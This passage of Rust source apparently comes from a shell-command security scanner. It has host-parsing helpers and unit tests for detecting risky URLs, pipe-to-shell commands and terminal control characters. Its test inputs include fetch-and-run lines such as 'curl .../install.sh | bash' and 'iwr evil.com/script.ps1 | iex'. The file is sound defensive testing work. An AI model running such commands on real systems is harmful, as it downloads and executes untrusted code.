            ".docx", ".xlsx", ".pptx", ".sqlite", ".lock",
            ".example", ".local", ".bak", ".tmp", ".swp", ".orig",
            ".patch", ".diff", ".map", ".env", ".sample", ".dist",
            ".editorconfig",
        ];
        let lowered = host_part.to_lowercase();
        if FILE_EXTS.iter().any(|ext| lowered.ends_with(ext)) {
            return false;
        }
    }
    // Require at least two labels (example.com, not just "file") and an
    // alphabetic TLD of 2-63 characters (DNS label length limit).
    let labels: Vec<&str> = host_part.split('.').collect();
    match labels.split_last() {
        Some((tld, rest)) if !rest.is_empty() => {
            (2..=63).contains(&tld.len()) && tld.chars().all(|c| c.is_ascii_alphabetic())
        }
        _ => false,
    }
}
1032
/// Returns the host portion of a schemeless URL (everything before the
/// first '/'), or the whole string when there is no path separator.
fn extract_host_from_schemeless(s: &str) -> String {
    match s.split_once('/') {
        Some((host, _)) => host.to_string(),
        None => s.to_string(),
    }
}
1036
/// Returns the path portion of a schemeless URL, including the leading '/',
/// or an empty string when there is no path separator.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map_or_else(String::new, |idx| s[idx..].to_string())
}
1044
#[cfg(test)]
mod tests {
    // Unit tests for this module: Tier 1 fast-path scanning, byte scanning
    // for control characters, URL extraction, and the schemeless-host /
    // output-flag heuristics.
    use super::*;

    // ─── Tier 1 scanning: exec context ───

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!tier1_scan("ls -la", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(tier1_scan("something | bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(tier1_scan("something | env bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(tier1_scan(
            "git clone git@github.com:user/repo",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(tier1_scan(
            "curl https://xn--example-cua.com",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(tier1_scan(
            "iwr https://evil.com/script.ps1",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(tier1_scan(
            "curl https://example.com/install.sh",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        assert!(tier1_scan("open file.zip", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
    }

    // ─── Tier 1 scanning: paste context (superset of exec patterns) ───

    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        assert!(tier1_scan("café", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_exec_no_non_ascii() {
        // Non-ASCII should NOT trigger exec-time scan
        assert!(!tier1_scan("echo café", ScanContext::Exec));
    }

    // ─── Byte scanning: ANSI escapes, control chars, bidi, zero-width ───

    #[test]
    fn test_byte_scan_ansi() {
        let input = b"hello \x1b[31mred\x1b[0m world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_byte_scan_control_chars() {
        let input = b"hello\rworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_byte_scan_bidi() {
        let input = "hello\u{202E}dlrow".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_bidi_controls);
    }

    #[test]
    fn test_byte_scan_zero_width() {
        let input = "hel\u{200B}lo".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_zero_width);
    }

    #[test]
    fn test_byte_scan_clean() {
        let input = b"hello world\n";
        let result = scan_bytes(input);
        assert!(!result.has_ansi_escapes);
        assert!(!result.has_control_chars);
        assert!(!result.has_bidi_controls);
        assert!(!result.has_zero_width);
    }

    // ─── URL extraction: schemes, env assignments, pipes, scp, docker ───

    #[test]
    fn test_extract_urls_basic() {
        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
        assert_eq!(urls.len(), 1);
        assert_eq!(urls[0].raw, "https://example.com/install.sh");
    }

    #[test]
    fn test_extract_urls_from_leading_env_assignment() {
        let urls = extract_urls(
            "PAYLOAD_URL=https://example.com/install.sh curl ok",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
            "leading env assignment URL should be extracted in sink context"
        );
    }

    #[test]
    fn test_extract_urls_from_quoted_leading_env_assignment() {
        let urls = extract_urls(
            "PAYLOAD_URL='https://example.com/install.sh' curl ok",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "https://example.com/install.sh"),
            "quoted leading env assignment URL should be extracted"
        );
    }

    #[test]
    fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
        let urls = extract_urls(
            "HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
            ShellType::Posix,
        );
        assert!(
            !urls.iter().any(|u| u.raw == "http://proxy:8080"),
            "proxy configuration URLs should not be treated as destinations"
        );
    }

    #[test]
    fn test_extract_urls_pipe() {
        let urls = extract_urls(
            "curl https://example.com/install.sh | bash",
            ShellType::Posix,
        );
        assert!(!urls.is_empty());
        assert!(urls[0].in_sink_context);
    }

    #[test]
    fn test_extract_urls_scp() {
        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
        assert!(!urls.is_empty());
        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
    }

    #[test]
    fn test_extract_docker_ref() {
        let urls = extract_urls("docker pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    #[test]
    fn test_extract_powershell_iwr() {
        let urls = extract_urls(
            "iwr https://example.com/script.ps1 | iex",
            ShellType::PowerShell,
        );
        assert!(!urls.is_empty());
    }

    // ─── Wrapper commands (env/command/time) must preserve sink context ───

    #[test]
    fn test_wrapper_preserves_sink_context() {
        let urls = extract_urls(
            "env --ignore-environment curl http://example.com",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "wrapped sink commands should keep sink context"
        );
    }

    #[test]
    fn test_env_wrapper_preserves_tirith_run_sink_context() {
        let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "env wrapper should preserve tirith run sink context"
        );
    }

    #[test]
    fn test_command_wrapper_preserves_tirith_run_sink_context() {
        let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "command wrapper should preserve tirith run sink context"
        );
    }

    #[test]
    fn test_time_wrapper_preserves_tirith_run_sink_context() {
        let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "time wrapper should preserve tirith run sink context"
        );
    }

    // ─── strip_quotes edge cases ───

    #[test]
    fn test_strip_quotes_single_char() {
        assert_eq!(strip_quotes("\""), "\"");
        assert_eq!(strip_quotes("'"), "'");
    }

    #[test]
    fn test_strip_quotes_empty() {
        assert_eq!(strip_quotes(""), "");
    }

    // ─── Byte scanning: additional control-char and escape-sequence coverage ───

    #[test]
    fn test_scan_bytes_bel_vt_del() {
        // BEL (0x07)
        let input = b"hello\x07world";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // VT (0x0B)
        let input = b"hello\x0Bworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // FF (0x0C)
        let input = b"hello\x0Cworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // DEL (0x7F)
        let input = b"hello\x7Fworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_scan_bytes_osc_apc_dcs() {
        // OSC: \e]
        let input = b"hello\x1b]0;title\x07world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        // APC: \e_
        let input = b"hello\x1b_dataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        // DCS: \eP
        let input = b"hello\x1bPdataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    // ─── Schemeless host heuristics: long TLDs ───

    #[test]
    fn test_schemeless_long_tld() {
        assert!(looks_like_schemeless_host("example.academy"));
        assert!(looks_like_schemeless_host("example.photography"));
    }

    // ─── Segment indexing and docker reference extraction ───

    #[test]
    fn test_segment_index_correct() {
        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
        // Each URL should have the segment index of the segment it came from
        for url in &urls {
            // segment_index should be 0 or 1, not an incrementing counter
            assert!(url.segment_index <= 1);
        }
    }

    #[test]
    fn test_docker_build_context_not_image() {
        let urls = extract_urls("docker build .", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(
            docker_urls.len(),
            0,
            "build context '.' should not be treated as image"
        );
    }

    #[test]
    fn test_docker_image_subcmd() {
        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    #[test]
    fn test_docker_run_image_after_double_dash() {
        let urls = extract_urls(
            "docker run --rm -- evil.registry/ns/img:1",
            ShellType::Posix,
        );
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
        assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
    }

    /// Constraint #2: Verify that EXTRACTOR_IDS is non-empty and
    /// that all generated fragment counts are positive.
    /// This is a module boundary enforcement test — ensures no secret
    /// extractors exist outside the declarative pattern table.
    #[test]
    fn test_tier1_module_boundary_enforcement() {
        // Verify extractor IDs are generated
        let ids = tier1_generated::EXTRACTOR_IDS;
        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
        // Verify exec and paste fragment counts
        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
        assert!(exec_count > 0, "Must have exec fragments");
        assert!(
            paste_count >= exec_count,
            "Paste fragments must be superset of exec fragments"
        );
        // Verify the generated patterns are valid regexes
        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
            .expect("Generated exec pattern must be valid regex");
        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
            .expect("Generated paste pattern must be valid regex");
    }

    // ─── CR normalization tests ───

    #[test]
    fn test_scan_bytes_trailing_cr_not_flagged() {
        let result = scan_bytes(b"/path\r");
        assert!(
            !result.has_control_chars,
            "trailing \\r should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_trailing_crlf_not_flagged() {
        let result = scan_bytes(b"/path\r\n");
        assert!(
            !result.has_control_chars,
            "trailing \\r\\n should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_windows_multiline_not_flagged() {
        let result = scan_bytes(b"line1\r\nline2\r\n");
        assert!(
            !result.has_control_chars,
            "Windows \\r\\n line endings should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_embedded_cr_still_flagged() {
        let result = scan_bytes(b"safe\rmalicious");
        assert!(
            result.has_control_chars,
            "embedded \\r before non-\\n should be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_mixed_crlf_and_attack_cr() {
        let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
        assert!(
            result.has_control_chars,
            "attack \\r mixed with \\r\\n should be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_only_cr() {
        let result = scan_bytes(b"\r");
        assert!(
            !result.has_control_chars,
            "lone trailing \\r should not be flagged"
        );
    }

    // ─── Output/credential flag values must not be treated as URLs ───

    #[test]
    fn test_schemeless_skip_curl_output_flag() {
        let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
        // Should NOT have schemeless URL for lenna.png
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "lenna.png should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_curl_output_combined() {
        let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "-olenna.png should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_wget_output_flag() {
        let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "output.html should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_wget_combined() {
        let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "-Ooutput.html should not be detected as schemeless URL"
        );
    }

    // ─── Schemeless host heuristics: positive and negative detection ───

    #[test]
    fn test_schemeless_real_domain_still_detected() {
        let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            !schemeless.is_empty(),
            "evil.com/payload should be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_user_at_host_detected_in_sink_context() {
        let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert_eq!(schemeless.len(), 1);
        assert_eq!(schemeless[0].raw, "user@bit.ly");
    }

    #[test]
    fn test_scp_user_at_host_not_treated_as_schemeless_url() {
        let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(schemeless.is_empty());
    }

    #[test]
    fn test_schemeless_png_no_slash_is_file() {
        assert!(!looks_like_schemeless_host("lenna.png"));
    }

    #[test]
    fn test_schemeless_tld_overlap_with_path_is_domain() {
        // evil.zip/payload has a path component, so the .zip extension heuristic
        // should NOT suppress it — evil.zip is a real TLD and this is a domain.
        assert!(looks_like_schemeless_host("evil.zip/payload"));
        assert!(looks_like_schemeless_host("evil.sh/payload"));
    }

    #[test]
    fn test_schemeless_tld_overlap_without_path_is_file() {
        // Without a path, lenna.zip / script.sh look like filenames, not domains.
        assert!(!looks_like_schemeless_host("lenna.zip"));
        assert!(!looks_like_schemeless_host("script.sh"));
    }

    #[test]
    fn test_schemeless_tld_overlap_sink_context_detected() {
        // In a real sink context, evil.zip/payload should be detected as schemeless URL.
        let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            !schemeless.is_empty(),
            "evil.zip/payload should be detected as schemeless URL in sink context"
        );
    }
}